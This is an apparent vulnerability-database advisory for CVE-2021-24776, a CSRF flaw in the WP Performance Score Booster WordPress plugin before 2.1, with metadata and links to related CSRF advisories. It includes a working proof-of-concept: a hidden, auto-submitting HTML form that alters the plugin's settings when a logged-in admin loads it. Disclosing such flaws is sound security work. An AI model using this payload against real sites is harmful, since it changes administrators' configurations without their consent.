WP Performance Score Booster < 2.1 – Settings Change via CSRF | CVE 2021-24776 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=wp-performance-score-booster&tab=settings" method="post" id="csrf">
<input name="wppsb_submit_hidden" value="Y" type="hidden">
<input name="wppsb_remove_query_strings" value="on" type="hidden">
<input name="wppsb_enable_gzip" value="on" type="hidden">
<input name="wppsb_expire_caching" value="off" type="hidden">
<input name="wppsb_instant_page_preload" value="off" type="hidden">
</form><script>csrf.submit()</script>

Affects Plugins

wp-performance-score-booster

Fixed in 2.1

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

a59ebab8-5df7-4093-b853-da9472f53508

Timeline

Publicly Published

2021-10-18 (about 4 years ago)

Added

2021-10-18 (about 4 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2022-04-14

Title

Fancy Product Designer < 4.7.6 - Arbitrary File Upload via CSRF

Published

2014-08-01

Title

A Forms 1.4.0 - Form Submission CSRF

Published

2024-12-11

Title

Amazon Product Price <= 1.1 - Cross-Site Request Forgery to Cross-Site Scripting

Published

2017-05-05

Title

Clean Login < 1.8 - Change Redirect URL CSRF

Published

2020-09-16

Title

Menu Swapper < 1.1.1 - Cross-Site Request Forgery